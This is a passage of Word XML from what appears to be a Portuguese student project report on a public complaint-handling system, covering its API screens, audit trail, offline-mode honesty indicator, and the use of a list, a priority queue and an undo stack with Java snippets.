              <w:t xml:space="preserve">, com 201, 400 campo a campo e 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 por protocolo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/api/denuncias/protocolo/{p}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Kanban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/api/denuncias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.../status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PATCH .../responsavel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Ficha do caso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/api/denuncias/{id}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cinco verbos de</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/equipe</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, com 403 para perfil sem permissão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e pilha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/api/fluxo/*</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, as estruturas da Parte 4 visíveis na tela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Trilha de auditoria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/api/auditoria*</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">incluindo o 403 renderizado como recusa explícita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estatístico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/api/stats/analitico</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">alimentando seis gráficos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Anexos (ícone de clipe no card)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/evidencias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 /arquivo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">com download auditado,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">DELETE</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">com motivo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Exportar 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/api/exportacao/denuncias</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, com</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">403</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">para perfil sem permissão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Indicadores do topo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e troca de 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/api/auth/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A aba de auditoria merece nota. Ela permanece</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">visível</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para perfis que não têm acesso a ela. Não é descuido: é ao clicar e receber</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Acesso negado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">que a segregação fica demonstrada, e a própria tentativa recusada aparece registrada na trilha depois, quando um AUDITOR a consulta. Esconder o botão pareceria segurança sem sê-la, porque o botão escondido continuaria acessível pelo console do navegador.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="86"/>
    <w:bookmarkStart w:id="87" w:name="X47843f2c5e71b4d7bfc9660d69c0ccc312f577c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3.5 Modo local e o dever de declarar a origem do dado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O módulo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">backend.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">concentra toda a conversa com a API: login JWT, cabeçalhos de autorização, tratamento de 401 com reautenticação e um</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">fallback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quando a API está fora do ar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">fallback</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">levantou um problema de honestidade. O painel ficava idêntico nos dois modos, e um gestor tomando decisão com base naquela tela não tinha como saber se os números vinham do banco ou apenas daquele navegador. A resposta foi o indicador de conexão (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">conexao.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), uma etiqueta na barra lateral que declara</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">API conectada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modo local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e é clicável para verificar de novo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Duas exceções ao</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">fallback</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ambas deliberadas:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">O relatório estatístico não tem modo local.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Média e desvio calculados sobre as poucas denúncias guardadas num navegador não descreveriam o canal, e a tela ficaria visualmente indistinguível de uma que descreve. Um gráfico bonito com número errado é pior que um aviso de indisponibilidade.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">O login não tem modo local.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sem servidor não existe autenticação. Liberar o painel ali seria repor exatamente a credencial fixa que esta fase acabou de remover do código.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="87"/>
    <w:bookmarkEnd w:id="88"/>
    <w:bookmarkEnd w:id="89"/>
    <w:bookmarkStart w:id="109" w:name="X073d2889797ff4483d976f92b0fc06dbc28942f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PARTE 4: Manipulação Avançada de Dados e Criação de Relatórios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">O que o enunciado pede</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">(a)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Atualize e explique o uso de estruturas de dados avançadas (listas, pilhas, filas) presentes na lógica do sistema ou na API.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Gere e analise relatórios estatísticos (gráficos, tabelas ou dados relevantes), explorando os conceitos do capítulo de estatística.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Analise os dados do projeto com cálculos e interpretações estatísticas aplicadas, apresentando gráficos e sugestões para o negócio.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A seção 4.1 responde ao item</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">(a)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, com uma subseção para cada uma das três estruturas citadas, mostrando tanto o uso na lógica do sistema quanto a exposição delas na API (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/fluxo/*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). A seção 4.2 responde ao item</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">(b)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, descrevendo a base, o método de cálculo e os seis gráficos do painel. A seção 4.3 responde ao item</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">(c)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, com oito recomendações de negócio, cada uma amarrada a um número desta análise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="94" w:name="X935a3481387c0ccec98e90e79a4a747a890290f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 Requisito (a): três estruturas, três problemas diferentes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O sistema usa lista, fila de prioridade e pilha. Nenhuma delas foi escolhida para cumprir um requisito de disciplina: cada uma resolve um problema que apareceu no fluxo de atendimento e que as outras duas resolveriam pior.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="90" w:name="lista-a-linha-do-tempo-da-denúncia"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1.1 Lista: a linha do tempo da denúncia</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A cada mudança de status, um evento é acrescentado ao histórico do caso. A estrutura precisa preservar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ordem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e ser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">somente de acréscimo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Num canal público, poder reordenar ou apagar um passo da linha do tempo destruiria a rastreabilidade que é a razão de a linha do tempo existir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@ElementCollection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FetchType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EAGER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@CollectionTable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"denuncia_historico"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joinColumns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@JoinColumn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"denuncia_id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@OrderColumn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"ordem"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HistoricoItem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historico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@OrderColumn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">é o detalhe que importa. Sem ele, o JPA carregaria a coleção na ordem que o banco devolvesse, e a linha do tempo exibida ao cidadão poderia mostrar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">concluída</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">antes de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">recebida</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Com ele, a posição vira uma coluna persistida: a ordem passa a ser um dado, e não uma coincidência de leitura. No modelo físico isso corresponde à única chave primária composta do projeto,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">(denuncia_id, ordem)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, descrita no Anexo A.3.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44"/>
        <w:gridCol w:w="1584"/>
        <w:gridCol w:w="4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Uso no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acrescentar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amortizado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mudança de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percorrer para exibir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por protocolo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acesso por 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 o passo anterior, no desfazer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="90"/>
    <w:bookmarkStart w:id="91" w:name="X1a1f99a03857f135e6f2b79ab4fed2b342cebb7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1.2 Fila de prioridade: a ordem de atendimento</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Atender por ordem de chegada seria injusto e perigoso: uma denúncia de violência em curso registrada agora não pode esperar atrás de uma reclamação administrativa de três dias atrás. A fila de prioridade mantém sempre no topo o caso mais grave, sem reordenar toda a coleção a cada inserção.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Denuncia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ordemDeAtendimento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Denuncia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">comparingInt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peso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getUrgenciaIa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CRITICA &gt; ALTA &gt; MEDIA &gt; BAIXA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thenComparing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Denuncia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reverseOrder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thenComparing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Denuncia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getCriadoEm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nullsLast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Comparator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naturalOrder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()));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terceiro critério existe por um motivo específico e bem documentado na literatura de sistemas operacionais:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">evitar inanição</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Escalonamento puramente por prioridade tem um problema conhecido, o de que processos de baixa prioridade podem nunca executar, e a solução clássica é o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">envelhecimento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, isto é, aumentar gradualmente a prioridade de quem espera há muito tempo (WANG, 2016). Aqui a antiguidade cumpre esse papel: garante que todo caso, mais cedo ou mais tarde, chega ao topo. A seção 4.2.8 mostra que este é exatamente o problema que a base revela.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A implementação é</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">java.util.PriorityQueue</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, descrita na documentação oficial como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">an unbounded priority queue based on a priority heap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, com custo O(log n) para enfileirar e desenfileirar e tempo constante para os métodos de consulta como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">peek</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(ORACLE, 2023a):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056"/>
        <w:gridCol w:w="369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importa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construir com n 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O(n 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vez por consulta à fila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o próximo,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">peek()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painel mostra o topo sem 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remover o próximo,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">poll()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ação</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">atender próximo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inserir um caso,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">offer()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O(log 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denúncia nova entra na posição certa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ordenar a lista inteira a cada consulta custaria O(n log n) toda vez. O heap paga esse custo uma única vez e depois entrega o topo em tempo constante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Um cuidado que virou teste: o comparador precisa ser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">consistente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, isto é, transitivo e antissimétrico. Um comparador inconsistente faz o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PriorityQueue</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">devolver elementos fora de ordem sem lançar exceção, o que é o pior tipo de defeito, porque não se manifesta como erro. O</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">FilaAtendimentoServiceTest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">verifica a consistência com 200 elementos gerados, além dos dois critérios de desempate isoladamente.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="91"/>
    <w:bookmarkStart w:id="92" w:name="pilha-o-histórico-reversível"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1.3 Pilha: o histórico reversível</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Desfazer é, por definição, uma operação LIFO: a próxima ação a ser revertida é sempre a mais recente. Uma lista permitiria remover qualquer elemento, o que abriria espaço para desfazer uma ação do meio do histórico e deixar o caso num estado que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">nunca existiu de verdade</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. A pilha torna esse erro impossível por construção.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Deque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AcaoReversivel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pilhas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ConcurrentHashMap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;&gt;();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LIMITE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Três decisões merecem registro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ArrayDeque</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">, e não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Stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A escolha não é preferência de estilo: a própria documentação da Oracle, na página da classe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, afirma que o conjunto de operações LIFO é fornecido de forma mais completa e consistente pela interface</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Deque</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e suas implementações,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">which should be used in preference to this class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(ORACLE, 2023b). A documentação do</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ArrayDeque</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">acrescenta que a classe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is likely to be faster than Stack when used as a stack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e que a maioria de suas operações roda em tempo constante amortizado (ORACLE, 2023c). A razão histórica é que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Stack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">herda de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Vector</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e sincroniza todos os métodos, pagando custo de trava mesmo em uso de uma única linha de execução.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Uma pilha por servidor.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Um atendente nunca desfaz a ação de outro. A chave do mapa é o e-mail do usuário autenticado, e o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PilhaAcoesServiceTest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">verifica esse isolamento explicitamente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Profundidade limitada a 20.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sem limite, uma sessão longa faria a pilha crescer indefinidamente em memória. Ao estourar, a ação mais antiga é descartada da base. O que se perde é a capacidade de desfazer algo de vinte passos atrás, que ninguém faz.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E a decisão mais importante:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">desfazer não reescreve a linha do tempo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aplicarStatus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Denuncia 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setStatus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getHistorico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novoPasso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acrescenta; nunca apaga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setConcluidaEm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"concluida"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status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passo errado permanece no histórico, e o retorno ao status anterior entra como evento novo. Num sistema público, poder apagar a própria pegada anularia a rastreabilidade: o desfazer existe para corrigir o estado do caso, não para esconder que houve um erro.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2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Complexidade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empilhar,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">push()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 amortizado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desempilhar,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">pop()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o topo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O(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="92"/>
    <w:bookmarkStart w:id="93" w:name="quadro-comparativo"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1.4 Quadro comparativo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2046"/>
        <w:gridCol w:w="1914"/>
